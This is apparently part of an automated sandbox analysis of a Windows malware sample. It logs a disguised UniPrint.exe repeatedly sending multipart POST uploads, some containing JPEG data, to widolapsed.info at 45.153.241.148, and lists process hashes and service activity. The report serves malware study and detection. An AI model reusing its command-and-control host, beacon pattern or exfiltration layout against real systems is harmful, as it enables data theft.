Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=95c8eef47be40b461fa65fa0ce34dbbc096bd99e0323a8e15a95747c4c938bb4; expires=Thu, 15-Sep-2022 11:46:45 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.3 | 49828 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:46 UTC | 2860 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76622
Content-Type: multipart/form-data; boundary=--------2156489369
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:46 UTC | 2861 | OUT | Data Ascii:
----------2156489369
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:47 UTC | 2935 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:46 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=7f6e6f1c3f4eb8b5923f86e1d66b2231ae7327e56c8929b4a31c431b6ba531d9; expires=Thu, 15-Sep-2022 11:46:46 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.3 | 49829 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:47 UTC | 2936 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76630
Content-Type: multipart/form-data; boundary=--------271647860
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:47 UTC | 2936 | OUT | Data Ascii:
----------271647860
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:48 UTC | 3011 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:47 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=6049f450a86c7a1730d09b84265de356cceeec30170fdc33e04fe3cc32d18290; expires=Thu, 15-Sep-2022 11:46:47 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49830 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:49 UTC | 3011 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76597
Content-Type: multipart/form-data; boundary=--------2981659231
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:49 UTC | 3012 | OUT | Data Ascii:
----------2981659231
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:49 UTC | 3086 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:49 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=32371b8918f49d051f052c88f77c2d32944b512750ae9f6e1292643728beeb53; expires=Thu, 15-Sep-2022 11:46:49 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49756 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:29 UTC | 310 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 81298
Content-Type: multipart/form-data; boundary=--------3135628383
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:29 UTC | 310 | OUT | Data Ascii:
----------3135628383
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:30 UTC | 390 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:29 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=794ba9da7d30af93b6fc902d2891bc2702299c6e807298e370a1b3f70798c8de; expires=Thu, 15-Sep-2022 11:45:29 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.3 | 49831 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:50 UTC | 3087 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76646
Content-Type: multipart/form-data; boundary=--------3817058548
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:50 UTC | 3087 | OUT | Data Ascii:
----------3817058548
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:50 UTC | 3162 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:50 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=cb6ef9a4c506285ad9bea51bb69448cc50b60d3866c545b924977e8a9c20c620; expires=Thu, 15-Sep-2022 11:46:50 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.3 | 49832 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:51 UTC | 3162 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76655
Content-Type: multipart/form-data; boundary=--------1585944860
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:51 UTC | 3163 | OUT | Data Ascii:
----------1585944860
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:46:52 UTC | 3237 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:51 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=34dcf45251fe7ac053bd429bbfba9697f5afaa35d044a3b774f14a3b89a76507; expires=Thu, 15-Sep-2022 11:46:51 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.3 | 49833 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:52 UTC | 3238 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76672
Content-Type: multipart/form-data; boundary=--------1049848244
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:52 UTC | 3238 | OUT | Data Ascii:
----------1049848244
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b8 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:52 UTC3254OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:52 UTC3270OUTData Raw: 2a c3 6d 14 32 ee 52 59 5a 47 82 e1 0f 20 30 20 0c a9 04 71 c8 ce 46 38 aa 34 9e 58 dd 9c b7 de dd b7 71 db bb 18 dd 8e 99 c7 19 eb 8e 2b 92 a6 15 4a a7 b4 3d 0a 58 f7 0a 3e ca dd 1f df 7f c8 78 a5 a4 a5 ae a3 cd 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5 c5 16 a6 cb 4b 73 20 fe 23 52 ad e3 8e b8 35 48 1a 76 6a 1d 38 9a 2a b2 2f 8b cf ef 28 34 be 7c 2d f7 a3 15 43 34 a1 8d 4b a4 8b 55 59 7b 6d a3 f5 4c 52 7d 8e d1 ba 1c
                                                                                                      Data Ascii: *m2RYZG 0 qF84Xq+J=X>x@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0Ks #R5Hvj8*/(4|-C4KUY{mLR}
                                                                                                      2021-09-15 11:46:52 UTC3286OUTData Raw: 32 78 a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f
                                                                                                      Data Ascii: 2xM6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/
                                                                                                      2021-09-15 11:46:52 UTC3302OUTData Raw: 0a 28 a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a
                                                                                                      Data Ascii: ((()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64
                                                                                                      2021-09-15 11:46:52 UTC3313OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 34 39 38 34 38 32 34 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1049848244--
2021-09-15 11:46:53 UTC | 3313 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:52 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=ae99abf3bf0dd74eb25b0666ae5e7ba551751d7a451b075c661bd74524a90ba1; expires=Thu, 15-Sep-2022 11:46:52 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.3 | 49834 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:46:53 UTC | 3313 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 76598
Content-Type: multipart/form-data; boundary=--------3157952906
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:46:55 UTC | 3388 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:46:54 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=604e277c7db07013ab15a278c88c4a71d701b08f48e2238569e6e160f2c4daa3; expires=Thu, 15-Sep-2022 11:46:54 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49757 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:30 UTC | 390 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 83326
Content-Type: multipart/form-data; boundary=--------2112300367
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:31 UTC | 472 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:30 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=41f3c356e7ed658eda1b73e87f8d1d8e2c0a1622c4617e1c07acdd5f39691625; expires=Thu, 15-Sep-2022 11:45:30 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49758 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:31 UTC | 472 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 83305
Content-Type: multipart/form-data; boundary=--------1747900146
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:31 UTC472OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 34 37 39 30 30 31 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1747900146Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
2021-09-15 11:45:32 UTC | 554 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:31 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=826ebcf8610b10d2ef33c9c81539d056e24545aa120e2d070e2626fbc0fffa57; expires=Thu, 15-Sep-2022 11:45:31 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:45:32 UTC | 554 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
Data Ascii: y80aRR64VR1K\!~v]


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49760 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:32 UTC | 554 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 83526
Content-Type: multipart/form-data; boundary=--------4043093276
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:32 UTC | 554 | OUT | Data Ascii:
----------4043093276
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:33 UTC | 636 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:32 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=50121d0d7b920ecf9b06f062985a3e93f1c5decde191e6f62180cd4ffe1ce659; expires=Thu, 15-Sep-2022 11:45:33 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:45:33 UTC | 636 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
Data Ascii: y80aRR64VR1K\!~v]


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49761 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:33 UTC | 636 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 81257
Content-Type: multipart/form-data; boundary=--------4228739266
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:33 UTC | 637 | OUT | Data Ascii:
----------4228739266
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:45:34 UTC | 716 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:45:33 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: X-Csrf-Token=45b0cc69e847efa543c144c39fbf12acab4529b7a9a61083f4eb4f5e97d242e0; expires=Thu, 15-Sep-2022 11:45:34 GMT; Max-Age=31536000; httponly
Content-Length: 48
Connection: close
Content-Type: application/json; charset=UTF-8
2021-09-15 11:45:34 UTC | 716 | IN | Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
Data Ascii: y80aRR64VR1K\!~v]


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49762 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:45:34 UTC | 716 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 81331
Content-Type: multipart/form-data; boundary=--------3803026718
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: widolapsed.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:45:34 UTC | 717 | OUT | Data Ascii:
----------3803026718
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:34 UTC    796    OUT    Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 30 33 30 32 36 37 31 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3803026718--
                                                                                                      2021-09-15 11:45:35 UTC    796    IN    HTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:34 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=293b9a65d5663fc7d1794afa48d5df4aca76c53fc72b066efee8d86d69ec8603; expires=Thu, 15-Sep-2022 11:45:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:35 UTC    796    IN    Data Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Code Manipulations

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:13:44:48
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\wogZe27GBB.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1773472 bytes
                                                                                                      MD5 hash:5EFC68ABD7FEC415E34980D95A06A66A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      General

                                                                                                      Start time:13:44:51
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:13:44:55
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                      Imagebase:0x400000
                                                                                                      File size:4375848 bytes
                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:low

                                                                                                      General

                                                                                                      Start time:13:45:02
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff7488e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:13:45:08
                                                                                                      Start date:15/09/2021
                                                                                                      Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Wow64 process (32bit):true
